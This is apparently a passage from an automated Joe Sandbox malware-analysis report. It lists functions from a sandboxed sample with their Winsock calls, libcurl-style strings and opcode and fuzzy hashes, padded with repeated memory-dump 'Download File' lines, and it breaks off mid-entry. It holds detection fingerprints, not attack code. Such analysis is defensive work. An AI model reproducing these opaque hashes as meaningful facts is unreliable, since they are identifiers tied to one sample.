Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: getsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 3358416759-2605427207
Opcode ID: 934051c102c78e19746799e48437fe1c282574aee7614bebc0c40d2c522b193a
Instruction ID: 3c2d3b4afafbe3011eb67aa3697390c9b12135597e6d24404dca1ad211f2b7b5
Opcode Fuzzy Hash: 934051c102c78e19746799e48437fe1c282574aee7614bebc0c40d2c522b193a
Instruction Fuzzy Hash: 08210A71808280BAF7259B19DC46FE7B7BCEF91328F041664F99863151FB32698587E2

Function 00E1D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202), ref: 00E1D65B

Strings

if_nametoindex, xrefs: 00E1D606
iphlpapi.dll, xrefs: 00E1D5F0

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: Startup
String ID: if_nametoindex$iphlpapi.dll
API String ID: 724789610-3097795196
Opcode ID: c47771fdec07665f5c8cbcadaa8232c0845f146e10ed9de8e2a351ce78ac8d82
Instruction ID: 767d694cf06810c6eef889f09dfd33c276219e43841ed07cd500ad7861448265
Opcode Fuzzy Hash: c47771fdec07665f5c8cbcadaa8232c0845f146e10ed9de8e2a351ce78ac8d82
Instruction Fuzzy Hash: B201DBF0D4934257FB117B3CAD1B3A635D06B92308F452868E848B52DAF669C588C293

Function 00ECAA30 Relevance: 4.9, APIs: 3, Instructions: 377
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(FFFFFFFF,?,00000000), ref: 00ECAB9A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00ECABE3

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: ioctlsocketsocket
String ID:
API String ID: 416004797-0
Opcode ID: 3ea9202fa57d90bc8ddca310de688ae8d099ad961fa79f59b91479567d3b3d1c
Instruction ID: 33d9baa001b923d9fcfe7969b036936f042ae7d56061155f5efd17a5115e3de1
Opcode Fuzzy Hash: 3ea9202fa57d90bc8ddca310de688ae8d099ad961fa79f59b91479567d3b3d1c
Instruction Fuzzy Hash: 8DE1C1706043059FEB20CF24C985FA677E5AF84308F186A3CF999AB291D776DC45CB92

Function 00E0F7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON

Download Yara Rule

APIs

WSACloseEvent.WS2_32(?), ref: 00E0F9C5

Strings

multi.c, xrefs: 00E0F9CA, 00E0F9FD, 00E0FA30

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: CloseEvent
String ID: multi.c
API String ID: 2624557715-214371023
Opcode ID: 869d94782bddc1bf0800f53c677381c1bfeda0e7f9db5a14575dd2655a8d89c2
Instruction ID: 225982b50f659b785d16397fda383587e53459875211c0bbf531fb17079cde2b
Opcode Fuzzy Hash: 869d94782bddc1bf0800f53c677381c1bfeda0e7f9db5a14575dd2655a8d89c2
Instruction Fuzzy Hash: 515108B1D043005BDB21AA709C42BA736E8AF5035CF085478F889BA2D3FB75E559C7A2

Function 00E078B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00E078BC

Strings

FD %s:%d sclose(%d), xrefs: 00E078CB

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: closesocket
String ID: FD %s:%d sclose(%d)
API String ID: 2781271927-3116021458
Opcode ID: f5fa0b3c82073a5fca738cd36cc4415c3bbcf5219056cc8bb911990e1f95f327
Instruction ID: 90982bae155a9a7b71182743f087af3b5840f1fb6c2c4da4e5faa2cac8336e9b
Opcode Fuzzy Hash: f5fa0b3c82073a5fca738cd36cc4415c3bbcf5219056cc8bb911990e1f95f327
Instruction Fuzzy Hash: 5CD05E329092317BC530A99A6C49C4B6BA8DDCAF60B065C58F99077204D130AC4087F2

Function 00ECB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00ECB29E,?,00000000,?,?), ref: 00ECB0B9
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00EB3C41,00000000), ref: 00ECB0C1

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: ErrorLastconnect
String ID:
API String ID: 374722065-0
Opcode ID: d468587799aa355520f771e4009d5415d137ded7a5e7b386563d9509d60ce9d4
Instruction ID: ab1093a46bec2eaaa093ce48c0ed545f160327fdec2a4aaef3f4ee2057d4cbd7
Opcode Fuzzy Hash: d468587799aa355520f771e4009d5415d137ded7a5e7b386563d9509d60ce9d4
Instruction Fuzzy Hash: 5A01D432204200DBCA205A788D86FABB399FF89368F040729F97CB31E1D727ED518752

Function 00EB4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32(00000000,00000040), ref: 00EB4AA4

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: gethostname
String ID:
API String ID: 144339138-0
Opcode ID: 4e478d8c0516570f71b5459e05048d163da3b7d0b63c0cba8f94e0ff8c57712d
Instruction ID: 1bf191c4c7d03fd8e19fa21d093f70ee3cb03a14704536aba93b828eb23e3bf4
Opcode Fuzzy Hash: 4e478d8c0516570f71b5459e05048d163da3b7d0b63c0cba8f94e0ff8c57712d
Instruction Fuzzy Hash: E151E6F06043018BE7309F29DE897A376E4EF4531DF14293CEA8AA66D2E775E844C752

Function 00ECAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 00ECAFD1

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: 3e24e2869bc17408e2a53915abc8f7ed8e581fd14c9a5e94e5d40404fcc9ebe7
Instruction ID: d9045d907c80ec81db780b2af0da0cd173861875bb28ca78b01f32b191cfc21b
Opcode Fuzzy Hash: 3e24e2869bc17408e2a53915abc8f7ed8e581fd14c9a5e94e5d40404fcc9ebe7
Instruction Fuzzy Hash: 7911B4708087C5D5EB268F18D502BE6B3F4EFD0328F10961CE59952150F7335AC68BC2

Function 00ECA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,00000000,00000000,?), ref: 00ECA97F

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 5fc2813f636de06385b2f83ef187e8ddaf6361a71e4c7c007a201235d9ddddea
Instruction ID: ed98bf66afb80889c43eda4eda7e0a7cc3489de939d6b59c516116824818a9bb
Opcode Fuzzy Hash: 5fc2813f636de06385b2f83ef187e8ddaf6361a71e4c7c007a201235d9ddddea
Instruction Fuzzy Hash: 9A01A771B107149FC6148F15EC45F5AB7A5EFC4724F0A856DE9982B361C331AC118BD1

Function 00ECAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00ECB280,00000000,-00000001,00000000,00ECB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00ECAF67

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 98167e5d7d38a9b50577998c7026ced02efd0f2c7913fd97a0f1a6d6fe9bb800
Instruction ID: db99041afffac93e48e5d8650ac397434a554b896d6c3ae04ead2af72619765c
Opcode Fuzzy Hash: 98167e5d7d38a9b50577998c7026ced02efd0f2c7913fd97a0f1a6d6fe9bb800
Instruction Fuzzy Hash: DFE0EDB6A092216BD654DA18E844EABF369EFC4B24F055A5DB85467204C370AC518BE2

Function 00ECB020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?,00EC9422,?,?,?,?,?,?,?,?,?,?,?,w3,01294C60,00000000), ref: 00ECB04C

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 30d443f68bce76767fccaf1a0fdbbe7fee92ea6740be6666c5b3591065be0b54
Instruction ID: d3d32b1bffeb776eea008151a65b26966aec3f5c935d2bb0f3c9ee08e74442f4
Opcode Fuzzy Hash: 30d443f68bce76767fccaf1a0fdbbe7fee92ea6740be6666c5b3591065be0b54
Instruction Fuzzy Hash: 29D0C23070020097CA208A54C986F47732B7FC0714F29DB6CE82C4A150C73BCC478A01

Function 00E667E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,8004667E,?,?,00E3AF56,?,00000001), ref: 00E667FC

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 27b06814c7f276516f9ae9225dea807143270232beaa3f9845ae587cc3cf00fe
Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
Opcode Fuzzy Hash: 27b06814c7f276516f9ae9225dea807143270232beaa3f9845ae587cc3cf00fe
Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16

Function 00E031D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00E032E7

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
